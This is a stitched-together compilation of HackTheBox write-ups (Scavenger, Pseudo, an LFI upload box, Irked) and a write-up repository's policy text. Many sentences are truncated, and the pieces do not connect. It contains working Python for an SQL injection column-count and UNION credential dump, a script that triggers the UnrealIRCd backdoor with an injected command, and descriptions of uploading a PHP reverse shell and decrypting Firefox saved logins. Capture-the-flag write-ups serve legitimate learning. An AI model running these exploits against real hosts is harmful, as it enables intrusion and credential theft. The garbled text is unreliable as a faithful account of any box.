Scavenger was a hard-rated box which was very frustrating at times due to a crazy number of rabbit holes. In the end, though, I think it was a pretty realistic box that tested enumeration skills as well as methodology. A SQL injection vulnerability in the whois lookup uncovered some hidden domains. Enumeration of these domains turned up a PHP shell that required fuzzing to discover the correct parameter to use.
This allowed further enumeration of the box, which found FTP credentials, allowing access to a. Analysis of the. Finally, a bit of reverse engineering on a binary yielded a magic string which allowed code execution as root. I normally show interesting things found during enumeration, but due to the large number of rabbit holes I will only mention some things in passing.
I added scavenger. I checked ftp which did not allow anonymous access.
HackTheBox Writeup: Scavenger
There was a potential vulnerability in Exim, but it was local only, so I filed that away. Time to check out http:. Next I checked out www. I did some more digging around to no avail, then switched to whois:. I got stuck here for a while until I took a step back and realized that the whois lookup was running on user-supplied input. I threw a single quote at it and was somewhat surprised to see a SQL error.
In hindsight, I shouldn't have been surprised had I taken a closer look at the nmap scan:. Sweet, that worked, but it output a ton of data. Let's filter the results with grep to only show the domains:. There was also an entry that referenced a bug tracker being pwned:. I ran gobuster on these domains. I spent some time exploring the app here but couldn't really get anywhere.
There is a place to upload files, but I couldn't find where they went. Eventually I got a nudge to further explore that shell. With some experimentation:.

First we will face a SQLi, then we will have to modify a C exploit to get a shell. Once we have a shell we will have to face a reversing challenge, and finally we will have to modify another C exploit. My nick in HackTheBox is manulqwerty. If you have any proposal or correction, do not hesitate to leave a comment. After reviewing the results we see that we have a register and a login:.
To make the injection easier, we will use the Burp Suite Repeater:. As we see in the SQLi cheat sheet, the first step is to guess the number of fields using ORDER BY:. We get these credentials:. With ftpuser:whereyougo? we can log in over SSH (seen in the nmap scan). To get a shell, we will use the Python reverse shell (remember to escape the quotes):.
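An added example (not code from the original write-up) that plays the ORDER BY column-count guess and the UNION dump against a throwaway SQLite database built inline. The table, the three-column lookup query and the credentials in it are constructed for the demo, not the box's; the technique is the one the paragraph above describes, with a parameterised lookup alongside it to show why the same payload does nothing there.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the box's database: two users, plaintext passwords."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'wonderland', 'alice@example.test');
        INSERT INTO users VALUES (2, 'bob', 'letmein', 'bob@example.test');
        """
    )
    return conn


def vulnerable_lookup(conn, username):
    # Deliberately vulnerable: the user-supplied value is concatenated into the SQL text,
    # which is the bug the whois/login forms on these boxes have. Three columns are selected.
    sql = "SELECT id, username, email FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def safe_lookup(conn, username):
    # Parameterised form: the value is bound, never parsed as SQL.
    sql = "SELECT id, username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def errors(conn, payload):
    """Oracle: True if the injected payload makes the backend query fail."""
    try:
        vulnerable_lookup(conn, payload)
        return False
    except sqlite3.Error:
        return True


def count_columns(conn, max_cols=32):
    """ORDER BY n succeeds while n <= number of selected columns and errors beyond it."""
    for n in range(1, max_cols + 1):
        if errors(conn, "' ORDER BY %d-- -" % n):
            return n - 1
    return None


def dump_credentials(conn, ncols):
    """UNION SELECT must match the column count; wanted columns first, NULL padding after."""
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    payload = "' UNION SELECT " + ", ".join(cols) + " FROM users-- -"
    return vulnerable_lookup(conn, payload)


def demo():
    conn = make_db()
    single_quote_breaks = errors(conn, "'")          # the first sign of injection
    ncols = count_columns(conn)                      # 3 for the constructed query
    creds = sorted((r[0], r[1]) for r in dump_credentials(conn, ncols))
    hardened = safe_lookup(conn, "' UNION SELECT username, password, NULL FROM users-- -")
    return single_quote_breaks, ncols, creds, hardened


if __name__ == "__main__":
    print(demo())
```

The oracle here is "did the query raise"; against a real application you read the same signal from the HTTP response (error text, status code or a changed page), which is what the Repeater step above is for.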
We look for files of the group Decoder; we found an. As we see in the pseudo-C that IDA Pro generates, we must pass -b as the first parameter and bypass the ifs at lines 31 and 35 so that the second parameter is run with system().
To run the second argument that we passed we must include a line break, or it will be concatenated with the preceding command:. We know that the version is xenial 4.

Tags: basg, hackthebox, htb, nightmare, reversing.
Pseudo is the toughest challenge on HTB in my opinion as of, well, before Headache v2 was released. Nothing even comes close to this reversing challenge, which centers around an aarch64 and VM crackme. Before I start, I would like to thank davidlightman for working on it with me.
He taught me many new reversing tricks and, oftentimes, managed to see things which I missed. Starting off, we identify that the binary is UPX packed, so unpack it first. Then, we realize that it is an aarch64 binary. To actually reverse this, I ended up using qemu user mode (qemu-aarch64). Luckily, qemu-aarch64 has both a gdb remote debugging interface and a strace option to use while emulating. For debugging, I used gdb-multiarch with the peda extension.
From an initial static analysis, we note that the main function is at 0xb0. Also, since it is statically compiled but completely stripped of symbols, it may help to identify some glibc functions.
How do we recognize which functions are glibc related? Well, I mainly analyzed strings and tried to map similarities to the real-life source code. Moreover, once I found that 0x49eba8 was assert, my life became a lot easier.
Remember to actually rename the functions as you go along. Function is where the most important part is. There are multiple loops, random floating-point arithmetic, and many conditionals. There also seems to be some bytecode starting from 0xb8. Let's get to some dynamic analysis. I highly recommend you use gdb's --command option to use its scripting capabilities. Upon running it, we get a message about "terminal for ants."
Now it prompts for a password! However, there is also a better way here: using qemu's strace, you will see a call to ioctl, which is what terminal screen size checks use.
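An added example, not from the original write-up, of what that ioctl check looks like and how to satisfy it without resizing your real terminal: the binary asks the kernel for the window size with TIOCGWINSZ, and a pseudo-terminal whose size we set with TIOCSWINSZ answers whatever we like. The minimum rows/columns used here are assumed values for the demo; the challenge's real thresholds are not on the page.

```python
import fcntl
import os
import struct
import termios

# Assumed thresholds for the demo only; the real binary's numbers are not on the page.
MIN_ROWS, MIN_COLS = 40, 120


def window_size(fd):
    """(rows, cols) of the terminal behind fd via ioctl(TIOCGWINSZ), the call strace shows."""
    raw = fcntl.ioctl(fd, termios.TIOCGWINSZ, b"\0" * 8)
    rows, cols, _xpixel, _ypixel = struct.unpack("HHHH", raw)   # struct winsize layout
    return rows, cols


def terminal_for_ants(fd, min_rows=MIN_ROWS, min_cols=MIN_COLS):
    """Model of the check: True when the program would refuse with the 'ants' message."""
    try:
        rows, cols = window_size(fd)
    except OSError:
        # Not a tty at all (pipe, redirected stdin under qemu): ioctl fails with ENOTTY,
        # which such a check typically treats the same as "too small".
        return True
    return rows < min_rows or cols < min_cols


def pty_with_size(rows, cols):
    """Allocate a pty and set its winsize with TIOCSWINSZ; the slave side is what a program sees."""
    master, slave = os.openpty()
    fcntl.ioctl(slave, termios.TIOCSWINSZ, struct.pack("HHHH", rows, cols, 0, 0))
    return master, slave


def demo():
    """Big pty passes, small pty fails, a plain pipe fails; returns the four observations."""
    big = pty_with_size(50, 200)
    small = pty_with_size(10, 20)
    r, w = os.pipe()
    try:
        return (
            window_size(big[1]),
            terminal_for_ants(big[1]),
            terminal_for_ants(small[1]),
            terminal_for_ants(r),
        )
    finally:
        for fd in (*big, *small, r, w):
            os.close(fd)


if __name__ == "__main__":
    print(demo())
```

When the target runs under qemu-user with gdb attached, the same trick applies from the outside: run it inside a pty (script, tmux, or a small pty wrapper) whose size you control, rather than patching the comparison out of the binary.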
As you can see at 0xe8, that is where the call is happening.

If we test submitting a tip we get back a URL with a secret name variable and what looks like a hash. Furthermore, if we look at the site in Burp we can see an admin cookie being set to 0. Checking out the List option we are presented with a list of our uploads and also a Whiterose. Just based off this hint we can assume there is an LFI vulnerability.
If we do a simple test on the op parameter we get a funny response. Here we can see that a directory with our IP address is getting created under uploads and our tip is uploaded there. Using the LFI on the source of index. We can also see the genFilename function located in common. This is where the hash value for the tip upload is coming from. For us to get code execution on the box we will have to leverage Burp as well as the PHP zip wrapper. First we will need to create a PHP reverse shell and then zip it.
In the area where the body of the tip normally goes, which in the above image is labeled shellzip, we use Burp's Paste from File option and select our zipped shell. We can verify our upload by downloading our payload directly from the server and running md5sum to ensure they are indeed the same file. Taking a look inside we find a crimestoppers. If we try nc localhost 80 and type get root it does indeed just error out with an error.
Going back to the. We can see that the passwords are encrypted. However, we can decrypt them using the key3. In my case it was zpuhcptf. Make backups of your existing key3. Now you can launch Firefox and, under the Security settings, view the saved passwords under Saved Logins.
Now that we are dom we can take a look at all the access. After looking through a few we finally find something.

absolomb's security blog

Machine write-ups until March are protected with the corresponding root flag. But since that date HTB flags are dynamic and different for every user, so it is not possible for us to maintain this kind of system.
So from now on we will accept only password-protected challenges and retired machines (write-ups for retired machines don't need a password). It is totally forbidden to unprotect (remove the password from) and distribute the PDF files of active machines; if we detect any misuse it will be reported immediately to the HTB admins. In any case, the authors of the write-ups of active machines in this repository are not responsible for any misuse of the corresponding documents. Please bear in mind that this is done to share techniques, not for spoilers.
In this way, you will be added to our top contributors list (see below) and you will also receive an invitation link to an exclusive Telegram group where several hints (not spoilers) are discussed for the HackTheBox machines. Please consider protecting the text of your write-up, e.
Of course, if someone leaks a write-up of an active machine it is not the responsibility of the author. If we detect someone doing so, we will immediately report it to the HTB staff so they can take the appropriate measures. Note: the minimum requirement to enter the "special" Telegram group is also to have Hacker level or higher (no script kiddies).
Hack The Box is a superb platform to learn pentesting; there are many challenges and machines of different levels, and with each one you manage to pass you learn a new thing. But talking among ourselves we realized that many times there are several ways to root a machine or get a flag. That's why we created this repository, as a site to share different unofficial write-ups in order to see different techniques and acquire even more knowledge.
That is our goal and our passion: to share in order to learn together. Some people have been distrustful because this repository contains write-ups of active machines, even though every one of them is protected with the corresponding password (root flag or challenge flag). But we did not want to give this up, because we think the most interesting thing for an HTB player is to check other users' walkthroughs right after they get it, that is, not wait for weeks or months afterwards.
For this reason, we asked the HTB admins and they gave us a pleasant surprise: in the future, they are going to add the ability for users to submit write-ups directly to HTB, which can automatically be unlocked after owning a machine. They will also merge in all of the write-ups from this GitHub page.
Simply great! Therefore it is a real source of pride that they have decided to include the functionality of this repo directly on their platform.
Welcome to another HackTheBox write-up! I'm posting the full write-up here on my blog instead of on 0x00sec because my compatriot vict0ni posted a nice write-up there this time around. I don't have any creds for SSH, so I decide to visit the webpage first to get an idea of what's going on with this box. Before I do that, though, I kick off my secondary Nmap scan:.
I find that small. Still not much happening there, either. I downloaded the image to search for metadata, but didn't find anything. The source of the page, while sparse, did provide us with the potential clue "IRC server coming soon!". I think it's time to consult searchsploit for possible exploits:. So there is a backdoor!
With that in mind, I prepare to fire up Metasploit, but before doing that I run searchsploit again to read the details of the exploit:. This is not a very complicated exploit. Once we connect to the IRC server, we send `AB;`, which triggers the backdoor and allows us to execute code. We then execute our payload in Metasploit (we'll pick a reverse shell of some kind and set the payload option variable to that shell), but if we were exploiting manually we would literally just replace everything after `AB;` with our own code.
We're connected, but our shell is terrible. I spent a lot of time trying to poke at the things I thought I needed, but the limitations of the shell made it extremely difficult. As usual, the angel that is guly clued me in on a very standard trick for getting a better shell instantly:. Now we have a much better way of working with our foothold, so I start enumerating in earnest. I am able to traverse into the directory, and I can see the user. However, I do not have permission to read it, so for now we'll leave it be.
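The manual version of the exchange described above, as an added example that is not part of the original post: the client connects to the IRC port and sends the `AB;` marker followed by a command, and a constructed stand-in for the backdoored daemon (which records the buffer instead of executing it) shows what the real one would hand to system(). Host, port and the command are placeholders for the demo.

```python
import socket
import threading


def backdoor_payload(cmd):
    """Trigger line for the UnrealIRCd 3.2.8.1 backdoor searchsploit describes.

    The trojaned daemon passes the received buffer to system() when it begins with "AB";
    writing "AB;" makes the marker a harmless unknown command and ";" starts ours.
    """
    return b"AB;" + cmd.encode() + b"\n"


def trigger(host, port, cmd, timeout=5.0):
    """Connect and fire; no IRC registration (NICK/USER) is needed, the check runs on raw input."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(backdoor_payload(cmd))


def demo(cmd="id"):
    """Constructed fake daemon on loopback: returns the buffer it would have given to system()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # ephemeral port; real target listens on 6697
    srv.listen(1)
    srv.settimeout(5.0)
    port = srv.getsockname()[1]
    received = []

    def serve():
        conn, _peer = srv.accept()
        with conn:
            buf = conn.recv(1024)
            if buf.startswith(b"AB"):   # the backdoor's check; real daemon: system(buf)
                received.append(buf.decode().rstrip("\n"))

    t = threading.Thread(target=serve)
    t.start()
    trigger("127.0.0.1", port, cmd)
    t.join(5.0)
    srv.close()
    return received[0] if received else None


if __name__ == "__main__":
    print(demo("id"))
```

In practice the command after `AB;` is the reverse shell itself (for example an nc or bash one-liner pointed at your listener), which is exactly what the Metasploit module fills in from its payload option.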
There is a hidden file named. At last, my time has come. I know of only one thing that might hold something more than appeared at first glance; our irked. Once we've run the command, the file pass. If we cat this file, we see a string:.
This might be our password, so knowing the directory we found it in, let's turn to SSH to see if we can authenticate and get another shell:. I spent an eternity on this box after this point. I learned a lot about enumeration. I used a combination of this resource and the venerable (though new to me at the time of working on this box) LinEnum and pspy.
For LinEnum, I ran it and just piped the output to a file. The same goes for pspy, though because pspy listens until terminated, I tend to run it for at least five minutes to ensure I capture any processes that recur on a schedule.
On this box I ran pspy32s, the smaller 32-bit build of pspy. Pictured below is the portion of output from LinEnum that held the key to our root path, although I completely missed it because I am still a noob when it comes to Linux privesc. I ran file on viewuser and confirmed it is an ELF. I read the contents of the file (you can do this with, in my preferred order, strings, xxd, less or cat) and noted this interesting bit:
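An added example, not from the original post, of the two checks the last paragraph does by hand: list the setuid binaries under a directory tree (the LinEnum output) and pull the printable strings out of one to spot absolute paths it references in world-writable locations, the kind of detail that is easy to skim past. The fixture it runs on is constructed in a temp directory (a fake ELF header plus two embedded paths); it is not the box's viewuser binary.

```python
import os
import re
import stat
import tempfile

# Locations an unprivileged user can normally write to; a SUID binary that references a file
# here can be hijacked by planting our own file at that path.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def find_suid(root):
    """Regular files under root carrying the setuid bit (what LinEnum's SUID section lists)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def strings(path, min_len=4):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    with open(path, "rb") as fh:
        data = fh.read()
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def suspicious_paths(path):
    """Absolute paths embedded in the binary that point into writable locations."""
    return [s for s in strings(path) if s.startswith(WRITABLE_PREFIXES)]


def demo():
    """Constructed fixture: a fake SUID helper referencing /tmp, plus a non-SUID file."""
    root = tempfile.mkdtemp()
    helper = os.path.join(root, "viewuser_like")          # stand-in, not the real viewuser
    with open(helper, "wb") as fh:
        fh.write(b"\x7fELF" + b"\x00" * 12 + b"/tmp/constructed_helper\x00/usr/bin/id\x00")
    os.chmod(helper, 0o4755)                              # owner rwx + setuid
    plain = os.path.join(root, "plain")
    with open(plain, "wb") as fh:
        fh.write(b"nothing to see\x00")
    os.chmod(plain, 0o755)
    suid_names = [os.path.basename(p) for p in find_suid(root)]
    return suid_names, suspicious_paths(helper)


if __name__ == "__main__":
    print(demo())
```

On a real host run find_suid over "/" (expect permission errors, which the walk skips) and feed anything unusual to suspicious_paths; a hit such as a /tmp path in a root-owned SUID binary is worth a look at how that path is used before anything else.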